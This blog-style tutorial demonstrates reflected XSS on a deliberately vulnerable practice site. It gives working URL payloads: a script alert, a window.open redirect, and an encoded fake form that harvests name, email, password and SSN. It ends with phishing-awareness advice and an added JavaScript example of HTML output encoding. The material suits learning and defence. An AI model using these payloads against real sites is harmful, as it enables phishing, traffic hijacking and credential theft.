Now, the way you inject your JavaScript depends on the particular site. There is no mechanism involved other than going through the painful process of reading hundreds of lines of their client-side code and hoping that they made a mistake. You can find XSS vulnerabilities by trial and error on low-profile websites, but corporate websites are usually secured against such trial-and-error methods, which means you have to go through the source code and find the programming mistakes.
Definitely, XSS or Cross-Site Scripting is a hot topic. Sometimes, when I'm bored and have nothing to do (which usually doesn't happen too often), I start looking for websites and try to see if they have some kind of vulnerability. I do it just because I like to learn from others and it helps me to understand how to protect my websites. Of course, I don't cause any problem or harm anyone, it is just for educational purposes. (Believe me, I'm being honest, lol)
However, it is not "super easy" to find vulnerabilities in websites, and if you want to learn how XSS works and how to apply it, you should go to: http://www.insecurelabs.org/
insecurelabs.org is an educational website which was built intentionally insecure for XSS, great, right!? So if you find XSS flaws, good for you.
Being on this website, you can start testing your scripts. For example, after the URL http://www.insecurelabs.org/ just add this script:
Search.aspx?Query=<script>alert('CSS Vulnerable - found it by BigBangCode')</script>
and hit the Enter key.
You'll see a dialog box with the text you entered. Of course, the website didn't mean to do that, but you just forced it to do it, feels good, right? lol
Another example:
Imagine you are somewhere on the internet and find this:
http://www.insecurelabs.org/Search.aspx?Query=%3Cscript%3Ewindow.open(%22http://bigbang-code.blogspot.com/%22)%3C/script%3E
At first sight, if you are not careful, just by looking at the first part of the URL (insecurelabs.org) you would think that the link will take you to that website. However, once you click on it, you will be redirected to my blog instead (look at the end of the URL). With this technique, taking advantage of this vulnerability, we can redirect traffic to our website by fooling people. Easy, right?
Wait, wait we are not done, =)
Now, paste this code in your browser and hit the Enter key:
http://www.insecurelabs.org/Search.aspx?Query=%3Chtml+xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%27%3E++++%3Chead+%3E+++++++%3Cmeta+http-equiv%3D%27Content-Type%27+content%3D%27text%2Fhtml%3B+charset%3Dutf-8%27%2F%3E+++++++%3Ctitle+%3EPlease+let+me+steal+your+private+information%3C%2Ftitle%3E++++%3C%2Fhead%3E+%3Cbody%3E+%3Ch1%3EPlease+let+me+steal+your+private+information%3C%2Fh1%3E+++%3Cform+id%3D%27sampleform%27+method%3D%27post%27+action%3D%27%27+%3E++++%3Cp%3E++++Name%3A+%3Cinput+type%3D%27text%27+name%3D%27Name%27+%2F%3E++++%3C%2Fp%3E++++%3Cp%3E++++Email%3A+%3Cinput+type%3D%27text%27+name%3D%27Email%27+%2F%3E++++%3C%2Fp%3E++++%3Cp%3E++++pass%3A+%3Cinput+type%3D%27text%27+name%3D%27pass%27+%2F%3E++++%3C%2Fp%3E++++%3Cp%3E++++SSN%3A+%3Cinput+type%3D%27text%27+name%3D%27ssn%27+%2F%3E++++%3C%2Fp%3E+++++%3Cp%3E++++%3Cinput+type%3D%27submit%27+name%3D%27Submit%27+value%3D%27Submit%27+%2F%3E++++%3C%2Fp%3E+%3C%2Fform%3E+++%3C%2Fbody%3E+%3C%2Fhtml%3E
Voila!!... It looks like the website has some page with a form that we can fill out with our private and critical information. Of course, it is FAKE! Some people would think it is real because it seems to be part of insecurelabs.org. That is why it is so important to look at the URL and make sure we are providing our information only to secure websites. Do we see any "https"? Does it look legit or real? Why is this website asking for SSN or credit card info? Always ask those kinds of questions when surfing the internet.
Even if you have 200 years of experience with computers, if you do not have common sense, you can be a victim of cybercrime.
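What all of the URLs above rely on is a page that copies the Query parameter into its HTML unchanged. The following is an added example, not code from this post or from insecurelabs.org: it puts that reflection beside the same page with output encoding and runs the two short URLs from the post through both. The function names and the "Results for" markup are assumptions.

```javascript
// Added example: hypothetical stand-in for a search page like Search.aspx?Query=...
// Function names and the "Results for" markup are assumptions, not the site's code.

// Encode the five characters that let text break out of an HTML text or attribute context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Pull the Query parameter out of a full URL, decoding its %XX escapes.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('Query') ?? '';
}

// Vulnerable: the decoded parameter is concatenated straight into the markup.
function renderVulnerable(query) {
  return '<p>Results for: ' + query + '</p>';
}

// Hardened: the same page, but the parameter is HTML-encoded on output.
function renderEncoded(query) {
  return '<p>Results for: ' + escapeHtml(query) + '</p>';
}

// True if the response contains an element the page author never wrote.
function containsInjectedTag(html) {
  return /<\s*(script|form|meta|html|body)\b/i.test(html);
}

// The two short URLs from the post (insecurelabs.org is a deliberately vulnerable lab site).
const urls = [
  "http://www.insecurelabs.org/Search.aspx?Query=<script>alert('CSS Vulnerable - found it by BigBangCode')</script>",
  'http://www.insecurelabs.org/Search.aspx?Query=%3Cscript%3Ewindow.open(%22http://bigbang-code.blogspot.com/%22)%3C/script%3E',
];

// Render one URL's query both ways and report whether markup survived.
function compare(url) {
  const q = queryFromUrl(url);
  return {
    vulnerable: containsInjectedTag(renderVulnerable(q)),
    encoded: containsInjectedTag(renderEncoded(q)),
    encodedHtml: renderEncoded(q),
  };
}

for (const url of urls) console.log(compare(url));
```

With encoding in place the browser shows the query as literal text, so the dialog box, the new window and the fake form never render.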